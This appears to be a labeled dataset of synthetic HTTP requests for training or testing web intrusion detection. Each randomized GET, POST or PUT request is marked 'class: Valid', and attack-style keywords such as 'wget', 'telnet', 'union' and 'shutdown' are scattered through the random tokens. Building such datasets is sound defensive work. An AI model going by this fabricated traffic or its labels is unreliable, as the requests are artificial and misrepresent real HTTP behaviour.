GET /uS0SsBlgzNfrombMacceptt/eCdPfromeVMTWthttps/20ux.UvAipyxAFj/lumSrOclpsInelehssd/s6alb.bin?ep5nnl=e-DHPidK&pQ0MG24ulBexech=tdh%26&aditoeeweLobdh=eae&hstkam=stO&bOtnxiulaOdva=aw&eebih=t_LgH&os0kdw=833&otu=rarkA&nrnoodesqkisd=rk9&iG=tsan&ihneernEetWole=rqumC.dg.gT&torpki2ealEaee=em1i.IN91E&ZJpRq=tiqean4atrael7&SkQY@ZSR=nser9pl&mimnhso=06915541 HTTP/1.1
Host: 166.106.143.45
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=34
Client-ip: 214.111.249.215
Cookie: nrw9=rXpCbv
Cookie2: $Version="13"
Date: Mon, 13 Jul 09 21:59:22 GMT
ETag: "dggS4pLlH80@P@Q"
Expect: 9Te1wop
From: h4onipb@tioEEuhai.ch
If-Modified-Since: Mon, 25 Feb 08 05:46:40 UTC
If-Unmodified-Since: Tue, 15 Dec 09 01:46:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Mar 06 20:09:16 GMT
Max-Forwards: 949
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic aHN4ZWNubGM6aHplcnBlTHI=
Authorization: Digest uri=http://www.4s2dpdh.it/r2o4/XEhnbM/HHnnBne/hoebuc/w8ogkAan.jsp
Range: -41
Referer: /xahu/tesze0OE/7edia/cb2K.php4
TE: deflate,chunked,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 2.5; bl-ti; rv:5.3.3) Gecko/73492475
UA-CPU: PowerPC
UA-Disp: 8779,521,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 465x0327
Via: 2.1 www.e7qa.htm, 5.3 45.85.199.60
Transfer-Encoding: identity
Upgrade: Tpmp/2.0
Warning: 822 www.lktdNoer.shtml "24aasRpgin2lE4les" 
X-Forwarded-For: 253.18.58.174
X-Serial-Number: 794051
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23023
Start - Id: 13189
class: Valid
GET /OOcopy/ted1nteE/rZ1MKt8b3nG/Isooqt8e0tii0r/anaqceDt.aspx?QpHz=92&uajo61heedE=hanes&Afe=35&nnazemhsitO=bs2Okuj HTTP/1.0
Host: 18.62.215.51
Connection: close
Accept: application/postscript;q=0.2, video/mpeg;q=0.0, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=72269
Client-ip: 169.235.34.90
Cookie: ioiewlgD7=34;oaosnehcin=dscr
Cookie2: $Version="70"
Date: Tue, 16 Feb 10 10:08:58 CET
ETag: W/"CHJemz4YjAijP7F-"
Expect: aAnouo=shoba
From: rejnuaHz@hckar.biz
If-Modified-Since: Mon, 10 Dec 07 12:43:30 CET
If-Unmodified-Since: Fri, 17 Nov 06 10:50:43 UTC
If-Match: "hHBLic6@x.xSraadZi"
If-None-Match: *
If-Range: Fri, 11 Aug 06 02:50:13 UTC
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="gohid"
Authorization: Digest nonce
Range: 645-,3478-02,76763-7861
Referer: /slmtdho/adeblce/0rjJtedh/e5nszqss.swf
TE: deflate,trailers
Trailer: Date
User-Agent: iZBrDXK http://www.o8enifu.com
UA-CPU: x86
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 992x6329
Via: FTP/7.8 236.155.135.124
Transfer-Encoding: gzip
Upgrade: skn/0.2, ttri5f/7.5, Xl2hi/6.4, lre/8.6
Warning: 093 www.sqesrdhj.jpeg "auusyDnie" "Tue, 02 May 06 18:48:59 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 82100256836
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13189
Start - Id: 4674
class: Valid
POST /lG@@kIPH6i9BkVBwC2/_AhttpsamKT/teetzellointntctl8/nvtimlmmWc/mD005544t3EhYJ5_p_T/oWpn725_fVvpV/gsDwPZ/mia/mWWhmGO@fu0VUH/hg/hkHY1UpBXu62yC/zrhhttya2alt.mdb? HTTP/1.1
Content-Length: 144
Content-Language: ses,ts
Content-Encoding: gzip
Content-Location: http://www.ineges.cz/hiod/3lyt4rt/rrnedi.mpg
Content-MD5: ZWVhbW44cG04MXNudXVlVA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jan 08 22:28:23 CET
Last-Modified: Sun, 04 Apr 10 05:32:44 GMT
Host: www.hataSas.net
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 138.205.233.134
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="2"
Date: Thu, 09 Mar 06 20:03:28 CET
ETag: W/"GNMzKzyE2ZglxXAupYRN"
Expect: 100-continue
From: 5FsjeuC@Tne6Halils.it
If-Modified-Since: Wed, 18 May 05 20:56:29 GMT
If-Unmodified-Since: Mon, 12 Nov 07 04:00:32 CET
If-Match: *
If-None-Match: "fkPtnj93x6lmaET"
If-Range: *
Max-Forwards: 9338
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Basic MG5udDpvc3RjOHVldQ==
Range: 511-,489649-576168,-523
Referer: /9eim2/etzombvs/stexsb7t/terurm.aspx
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.4 (X11; U; Open BSD i586 0.8; 1r-h5; rv:4.7.4) Gecko/37998026
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 561x7800
Via: 2.0 0.41.4.21, 2.8 www.ezeh.jpg
Transfer-Encoding: compress
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 238 148.230.14.82 "4rrh4aee0nl" "Tue, 25 Jan 05 05:33:08 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 2125001
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

csstnisRt=2eincludeohin v6&kiSiu9teo=206372&I.gyxF=e2dVP@YI_en&re=so8Fs0ar&iTlthptlD= 6&eeintskby=ihn2&eaonneeortTe=6277009&lniarterreennhw=77

End - Id: 4674
Start - Id: 26824
class: Valid
GET /Xjr/h-Wkkez-P/69UrDQDsG.png?hXs=31&DQFH=976&chUtnoed2n=rei2l7z&bisfir=8%5C&kh=drop8hns&orud04c=hj&cwtsg=7321062&qnooht=2 HTTP/1.0
Host: 67.11.36.169:52
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 236.78.214.28
Cookie: dcQgV=hteAtu9aEfthoie;sm=holcoi'ec92se8
Cookie2: $Version="419"
Date: Fri, 19 Jun 09 13:47:29 GMT
ETag: "gbtpvYZTunud1Vk."
Expect: 100-continue
From: 4ahee@onawd.st
If-Modified-Since: Mon, 07 Sep 09 18:06:44 GMT
If-Unmodified-Since: Fri, 02 May 08 16:19:20 CET
If-Match: *
If-None-Match: "cEahrBQ2hDbHR.EIm"
If-Range: Mon, 16 Jul 07 15:47:11 UTC
Max-Forwards: 8197
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: he0acl apeterat=gd5ednlo
Range: -6214
Referer: /welF8m/hratj/ee92vf/5re4d1.css
TE: chunked;q=0.5,deflate
Trailer: TE
User-Agent: raip (oEYd2U)
UA-CPU: StrongARM
UA-Disp: 119,955,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9604x4951
Via: FTP/5.8 www.gOilxsrn.shtml:46620, 4.2 153.96.22.24:299, Atxa/1.7 96.119.2.50:7142
Transfer-Encoding: identity
Upgrade: opiEo/2.6, i3n5Ve/7.1
Warning: 903 67.160.229.95 "skdeatIepssEhEp" "Mon, 06 Aug 07 13:22:12 UTC"
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 51104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26824
Start - Id: 19953
class: Valid
GET /avf/CJz8wT/5oiNbk/iW7RcYxp1WuXSTeWl.php3? HTTP/1.0
Host: www.rhoemh.gov
Connection: close
Accept: application/rtf;q=0.0, text/html;q=0.6
Accept-Charset: iso-8859-3;q=0.6, utf-8;q=0.0, x-mac-korean;q=0.7
Accept-Encoding: identity, identity;q=0.1, gzip, deflate, deflate
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 160.212.207.190
Cookie: di=8849684;7lgqservices_VD-DA=17516533;tc6nenssheirxFz=FnelesnsoqV;enuh=plsocs;5mhi=rz5KW
Cookie2: $Version="317"
Date: Mon, 19 Feb 07 21:38:06 UTC
ETag: W/"MrWx0rpeX4hOKRcv"
Expect: 100-continue
From: 5qne@rrdvdl8.net
If-Modified-Since: Mon, 26 Oct 09 12:00:05 GMT
If-Unmodified-Since: Wed, 03 Oct 07 16:15:31 UTC
If-Match: *
If-None-Match: "9OblbQOckg2TPDM"
If-Range: "6RhJU78e1c3p8Q4csu8"
Max-Forwards: 3
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic aGJlYXR4c2k6VHIzZg==
Authorization: Basic ZnRzZWo6eGNzZWUyb2k=
Range: -3850,54-
Referer: /RamaqR/esthIt/Perte4uj/daesy2te/ydoecee0.mpeg
TE: trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 2.7; st-n3; rv:2.6.6) Gecko/84060622
UA-CPU: Sparc
UA-Disp: 0226,856,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9661x3912
Via: wGaes/1.2 www.xobpe.js:58172, 9.2 www.kaamoy.gif
Transfer-Encoding: compress
Upgrade: 1e4/9.3, eielY/2.7, nearu0/5.9, qtc/5.6, ttot/4.4
Warning: 584 29.186.172.18:663 "aatB6aAprgMv02tqrt" 
X-Forwarded-For: 129.122.159.101
X-Serial-Number: 054285780233715
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19953
Start - Id: 26091
class: Valid
GET /r0/iwelenotolpc2heefer.css?nsssarH57oob=hI&orstnsOn=264&dwnnyt1Alyl6h=55890&le5hhgrn2toen=d8tCs%29Thomesmt+bh+tldcg&bDHwTwejnn=te9etrahisisz+s%257c%3Fopt&wKeT7kd=u2ZP0848i&tts=r3xdnmO&6t1zibvtoeal=916045&0orsffooreaufno=a4qyRxPI&luiEiLtela=rtU HTTP/1.1
Host: 237.137.244.8
Connection: close
Accept: video/*, text/*;q=0.5
Accept-Charset: cp-932;q=0.1, windows-1253, cp-950;q=0.0
Accept-Encoding: compress, gzip;q=0.1
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 104.91.44.192
Cookie: voxzpplnrP=144;krreLa4En=ihbfdc9c
Cookie2: $Version="1"
Date: Fri, 03 Jul 09 11:11:13 GMT
ETag: "Ql9OThmryf.DkekWJs"
Expect: 100-continue
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Sun, 18 Sep 05 17:06:51 CET
If-Unmodified-Since: Thu, 12 Nov 09 02:43:25 GMT
If-Match: "Hd5kc6hr0.BGlLC354mn"
If-None-Match: "64VQhf2uae--9MvNPENC"
If-Range: "PEe1.BdVVQrY47gv"
Max-Forwards: 64
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: Basic cUxyb1VzOnRlb2x2RA==
Range: -41,2933-4708,1-5204
Referer: /etinel.txt
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 0.1; sh-El; rv:1.7.6) Gecko/48089172
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 096x0326
Via: HTTP/8.0 www.noitose.jpeg, HTTP/3.9 46.112.164.48, 4.3 www.eeqhrta.css
Transfer-Encoding: gzip
Upgrade: nayX6/3.9, aeehm0/9.5, fTl/8.5
Warning: 624 www.0t7ct.css "Ahem" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 07602073887440146
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26091
Start - Id: 27176
class: Valid
GET /7hhaagH2lse42e/uinuqqte7oteeteot/XF.9lj8/ctesOnlu/e1dhritha0/5l3z./83_db/ep8O/Tz/ufp/laa.bin?yuoah2uioy5oA2=8sbfIz&neiIsr=0&oDh=7140829&rsa=rc++t%7ETt5andoci&lretob7hqEh=otmioslwxd6&OxfI5zrm=snuh3ceer&eoeF=slolsn&o6E5eNkrOafenzh=0o-r0jmetamdocumentshtacces%3CmhincludeltaAm HTTP/1.1
Host: 138.184.113.81
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: e-OOhehlnh, irce9ani-7nlA0, egonki-aw;q=0.9
Cache-Control: no-store
Client-ip: 30.130.235.21
Cookie: etelde=rphp;_Yhn=3;tnetnPtseae4d=xo;tslt=44164;iltrirIXsp=2052;.perl5ftpEiDls=|inputVwgetikt
Cookie2: $Version="9"
Date: Thu, 19 Nov 09 19:19:54 CET
ETag: "G@QbMBly6v5UAVTgSi"
Expect: 100-continue
From: NnNme@unaivpat.ch
If-Modified-Since: Tue, 09 Jan 07 15:12:00 CET
If-Unmodified-Since: Sat, 01 Nov 08 22:50:07 GMT
If-Match: "TL9wcdfaej5MFfDvDYKZ"
If-None-Match: *
If-Range: Sat, 13 Jun 09 11:45:56 CET
Max-Forwards: 9167
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Digest nc=400a60cB
Range: 23428-078577
Referer: http://www.Bo7e.st/3nmx/ldtg9/otEtstoi/suro.cgi
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.2 (Windows; U; Win 9x 8.0; dl-ip; rv:2.6.0) Gecko/72795110
UA-CPU: MIPS
UA-Disp: 347,7317,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3319x950
Via: 4.3 119.69.22.42:6193, FTP/4.9 246.111.229.190:266, HTTP/9.6 www.rwwehmaa.shtml
Transfer-Encoding: gzip
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 437437535
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27176
Start - Id: 16322
class: Valid
GET /sF/t7R.x@I-jSkJTL.3.dll?nca7m8tu=ishutdownN&7ew7a=txdce&eDroifi1poiem=ssn6Ovcc8iimi2se&hluseminel7e=services%40%3Fb&oQ=tnCrU&hhhfa=mLiaesnm%28t+zrns&eeqr=00121691&9bebZ0=165&R7vxnK=aa%5CnE&4orh3oupwo=912747&mliyNMPmiscriptunion=hzKHg%40C&Vey36IhfdI=534&oaetsm=dA5tltldwloyaotdiy&twphq8E2iii=029595&dtiset4wVonm=60126776 HTTP/1.0
Host: 212.93.18.151
Connection: keep-alive
Accept: application/x-tar;q=0.2, text/html;q=0.8, application/*
Accept-Charset: x-mac-arabic;q=0.5
Accept-Encoding: deflate;q=0.8, deflate;q=0.4, compress, deflate;q=0.7, deflate;q=0.2
Accept-Language: ai8snnuc-neqw5nl;q=0.8, te8royhY-b79ooR;q=0.0, i8e-edhIe;q=0.5, itnlum-tue4soo;q=0.0
Cache-Control: max-age=9017
Client-ip: 76.128.152.96
Cookie: vtY2=5695;enteycorljiote=dgeTt<;dAttos= mecho'oe;j
Cookie2: $Version="1"
Date: Mon, 16 Jun 08 09:20:10 UTC
ETag: "OIq2z55.cn@ja3WSe625"
Expect: mii8=7pi0yr;blo1=Utnsh
From: fewlhd@mrbErs.biz
If-Modified-Since: Fri, 17 Jun 05 23:22:19 GMT
If-Unmodified-Since: Sat, 04 Dec 04 16:57:05 UTC
If-Match: *
If-None-Match: "9F4ToGyUfty41U9g"
If-Range: "c@o4EuJExI7aVKdFI"
Max-Forwards: 4051
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="82A7c3FC33BF6ce472e42Ce6b7Ca8D7B"
Authorization: Basic ZWlvZWNlZTppc2hmb3Vt
Range: -652120,9-,091-
Referer: /tisugrd/UnHo.doc
TE: gzip;q=0.2,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.0 (Windows; U; Win98 2.3; tl-rr; rv:2.9.7) Gecko/50294404
UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 295x026
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: deflate
Upgrade: znuO/5.9, rnoe23/2.5, sutmh/9.2, Paxtie/5.0, dcrIu3/2.7
Warning: 533 www.sednnp.jpg "tceskevmhah" "Sat, 03 Dec 05 07:14:22 UTC"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 5823721853014
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16322
Start - Id: 30316
class: Valid
GET /oAFb/oseoiuRt/7dRVYOMLx3/ittyruh5HeiamenyrhS/3Xpmi.2processing-instructiondeleteF7mU/nhnc2sniwen/e1Se962rosuee/sARE7p@GzYzh3IM/hadminZEUCPyiBY3w-P/eamilaplNsn/eoMJCt/pec5OlvnmGCgF.php3?vH2CL2sGKE=n3mg+likewodropc&yen=raFubhttpsf6wnuu+6s%3Fa5r3&rhphkjtN=lscnxTa2&eng8eohtbAeu9r=ot&pwrooieetccd9w=f2amepese&cus=64&5eem=snt%3Aa&Osotnftt6Ow=nn%27t%3CeT&ngaIbt6d=06615&tie=236 HTTP/1.1
Host: 44.121.219.240:80
Connection: close
Accept: application/x-tar;q=0.8
Accept-Charset: iso-8859-1;q=0.0, windows-1255, windows-1255;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: Oe-nre
Cache-Control: max-stale=14539
Client-ip: 125.3.188.70
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="337"
Date: Mon, 02 Feb 09 18:42:07 UTC
ETag: W/"xliPt_ly5_0Z-ER.-rRb"
Expect: 100-continue
From: eredri@rnloehihom.net
If-Modified-Since: Thu, 22 Apr 10 05:19:45 UTC
If-Unmodified-Since: Tue, 06 Jan 04 01:41:04 CET
If-Match: "6A0.Xpfyvjc4cTb2"
If-None-Match: "j_IzFVago1TTnzx_eDe"
If-Range: Sat, 21 Jun 08 04:49:46 GMT
Max-Forwards: 28
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXJ0SWN5YjU6aFRuNHRu
Authorization: ad3pcf ehoi=8oeos
Range: 54-167889
Referer: http://www.mypgrb.ch/cdnqp/ooTutiii/ngesaofn/unlt.php
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: sr6iQ@n http://www.hnihni.be
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3971x442
Via: xkd/2.8 195.189.211.95, FTP/2.7 201.213.227.255:45600, 5.4 www.ioarsimr.shtml
Transfer-Encoding: identity
Upgrade: hztley/9.7, peaeM/3.4, iwtar/8.7, 1Tzzin/0.9, roh/9.3
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30316
Start - Id: 7618
class: Valid
PUT /e0nubR9WhQkPJlfPSA.js? HTTP/1.0
Content-Length: 213
Content-Language: eNEs,ol,tdfnaOma
Content-Encoding: identity
Content-Location: http://www.dsotkz.biz/acszthtl/aaNn.jpeg
Content-MD5: SEl0c1VpdFNjdGFIc3lydA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Apr 08 06:25:12 CET
Last-Modified: Thu, 17 Mar 05 05:58:21 UTC
Host: 38.172.204.74
Connection: close
Accept: text/xml;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 136.161.142.168
Cookie: et=dotte;itss=aAU7FF.Kk-B;D@drop2tmpVla=2618456;u5l=Te;1nqlncgzKh5eo=6004;odsailhebzaec=abXcno
Cookie2: $Version="290"
Date: Wed, 14 Sep 05 19:06:52 GMT
ETag: W/".4p6PEIV3g0ofzhrJd_X"
Expect: 100-continue
From: 2Tthh6@ahpbWtcgw.st
If-Modified-Since: Tue, 24 Aug 04 04:15:56 GMT
If-Unmodified-Since: Fri, 09 Apr 04 16:43:21 CET
If-Match: "huMO@icQXZzZYrOs"
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 5.9
Pragma: lnqta=fen
Proxy-Authorization: Basic UzluZWhtbjp0dWxnbg==
Authorization: NTLM YUFmZGVvaGo4NmxYRWpwbGZsZHVHdXdldEl0c3JlcW9z
Range: 4990-,-42306,415-
Referer: http://www.nua7n.biz/lkdmtsgx/hiiEsei/jln3enit/rtpt.doc
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.3 (X11; U; Unix 0.3; o5-wm; rv:4.7.8) Gecko/42585479
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/1.8 www.aelnK.png:9, 0.9 224.212.157.113, FTP/3.4 34.4.193.138
Transfer-Encoding: compress
Upgrade: rOmVn/8.0
X-Forwarded-For: 223.150.236.173
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

oaohxae=dimIoqn&IEcseehaiipqumn=gGSuVaR&uincludedTSh=iinsertnpositionA&9nasHe=atiwu&otlSauYautE=0P3c&aS=vs&mwGSGEbS4=dtdltta autoexec-rs ahc&hMslehxaaeo=bgsoundscriptna &3aui=9404202&uoeaydemnjsa=ExmbresSrrthttpnh

End - Id: 7618
Start - Id: 24157
class: Valid
GET /GaMunioniqKHHIlike/imli/tqhLutoonmrcela/rs6iud/Nie/3irne/bae17re2nyemt/yQznS5qrq21JAlTqJD/8ltrrnniNosal/diiae6lerst.jpg?0eAo7tembinleu=61&nm9lraEda=sock_streamn%3Ea&dyih=128027682&Ocdae6os1e=48389764&6esuN4hkmAeidE=7920&oditlu=6YJemWZPLk&Ujzrt1RvSa=nhs9belyNgegt2sef&eAx=rhXB.&eaxob=ea+%27rQo%26s5&telnetOw7V9_@E=347803447&u096x7tBar=lwt4zxfAQL&iE=sav&idn1etitAggta=+izmo%25nmep1&naar11Aaafs=uwnpnOcsartaaxj HTTP/1.1
Host: 112.102.2.152
Connection: totld8
Accept: */*;q=0.7
Accept-Charset: iso-8859-8;q=0.0, x-mac-chinesetrad, euc-cn, windows-874, iso-10646-ucs-2
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Cache-Control: max-age=67336
Client-ip: 123.204.230.26
Cookie: TA9t4seSilNer=1260;IB@@iframe8JqjTV=250086;idunionJhWF8=2
Cookie2: $Version="45"
Date: Sat, 03 Apr 04 11:09:59 GMT
ETag: "s4tBYBnxgRfhumtRaIa"
Expect: 100-continue
From: neneodav@v5otnE.st
If-Modified-Since: Thu, 28 Sep 06 06:12:30 GMT
If-Unmodified-Since: Mon, 23 Aug 04 06:17:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: eoczsc itSh=mlee
Authorization: sagzi arhoteu=ahqsel
Range: 392642-8535,09679-
Referer: http://Ilatt.com/wDlhmo/eabhiarz/Tuntalan/itfdeahh.bin
TE: chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 0.8; gt-ei; rv:5.9.9) Gecko/88916275
UA-CPU: StrongARM
UA-Disp: 2537,365,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9598x0214
Via: drrl/3.7 www.m4eu.js, 8.9 www.thsa.css, 0.1 244.39.117.117
Transfer-Encoding: fsl3y; eots=oo5d
Upgrade: eiii/0.5, 9ndue/3.8, tBtdt/3.0
Warning: 176 www.afsytan0.shtml:89321 "rtelrjklcea6e5" "Fri, 30 Oct 09 01:05:38 CET"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 14467935951
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24157
Start - Id: 30378
class: Valid
GET /qN5wMCssIqi/aCnotsjyn/ouMgSzDpifhtVMyn/DyonyAwaei2Rtehiteay/c0n/yI8_RZ2P.ZC/OUx/awBmrQfM7OJM.oHhPqr/e3A/lthteguUoitnsoemhE/aj0myahofKbrwets/rmdtns5nap.js? HTTP/1.0
Host: 164.20.11.80
Connection: yuhHom
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: ewjoa-rad;q=0.2, lkwreih-dn;q=0.3, edHa4ef-x, jet-n;q=0.0, stb-idihed;q=0.7
Cache-Control: only-if-cached
Client-ip: 177.148.20.74
Cookie: usiRoeme1=4;ysoQvobnoTvs=ho;pius3pSrcn1=6590519545;f9xvdOoanh=(gkShttsw1s;cnewrgK=Uqlrmroleneb;bpSnZCc_=3152
Cookie2: $Version="63"
Date: Sun, 12 Aug 07 14:34:58 GMT
ETag: W/"R.PIx.qTyX0ifEf."
Expect: irloe=dsKep;sb3ik
From: eonljol@h9iohse.fr
If-Modified-Since: Sat, 28 Jun 08 16:37:08 UTC
If-Unmodified-Since: Sat, 15 Jan 05 17:36:41 GMT
If-Match: *
If-None-Match: *
If-Range: "BxmgI2x_taHLW6LYE5"
Max-Forwards: 73
MIME-Version: 4.2
Pragma: a=ejstotma
Proxy-Authorization: ltwa aarnA=yustwx
Authorization: NTLM ZWFnUmU0Yjlrb2RPRXR3YWMwYW9jc2xhOXp0czZ0ZWFQSTZ1c2Ntaw==
Range: -4
Referer: /ierho/rargah/cAlrsho.mp3
TE: trailers
Trailer: Referer
User-Agent: teaau/4.6
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9503x4246
Via: mxeirw/2.5 www.wtofo2.css
Transfer-Encoding: gzip
Upgrade: bhHcwU/7.0, m4tay/8.3
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30378
Start - Id: 12812
class: Valid
GET /HqZbkLpEkQ7/rc7OAr/ssh8lay/3N7oL6xx/a_FhzYIv4WEf/0dyangtm/3winrnr1esnAe.swf?hw=gdJPgGTFwS&snbidctf=nWbhU&irfrtcnedtk=127173&l8ytmsdcithccpl=7341550689&lub=20670&astil89od22=22oerodfeiiya&fromUv-Pls8-0L=okd&mastla=50509186&rcpDEadminoKLn_e=38556&wwrsoet=bfa HTTP/1.1
Host: www.astro.be:94
Connection: keep-alive
Accept: text/*;q=0.8, application/postscript;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=16271
Client-ip: 104.144.236.15
Cookie: geUxl3=7Adbqq;leaSwEhrenhrmeh=taJijps4yrnxncrso;fdOnlBrrh0=228063806;etly=202550;3Etelnet9N0cNGMVa=s
Cookie2: $Version="0"
Date: Tue, 07 Oct 08 08:00:20 GMT
ETag: W/"OC3Mp1v8cvCtQtamre"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Wed, 18 Feb 04 06:04:07 CET
If-Unmodified-Since: Wed, 02 Dec 09 13:11:55 CET
If-Match: "74mm_7MQC5UDJrAIz"
If-None-Match: "QkgLkd2j8zorKrq9"
If-Range: Thu, 20 Apr 06 20:00:33 CET
Max-Forwards: 51
MIME-Version: 8.3
Pragma: pMcshzue='0Stb'
Proxy-Authorization: Digest nonce
Authorization: NTLM ckh4aWNhdW9heWkyZWNvbHk5aXVkcmFsUm5sNHRpc2lUdWxl
Range: 880687-,10-
Referer: /sotpmt.mpg
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 4.8; ei-8e; rv:7.4.6) Gecko/59721525
UA-CPU: MIPS
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: HTTP/9.7 www.a2totu.html, 1.7 133.7.199.120, 6.6 www.snUodhn.shtml
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 494 130.146.46.121 "atTyo" "Sun, 05 Oct 08 10:26:05 GMT"
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12812
Start - Id: 26731
class: Valid
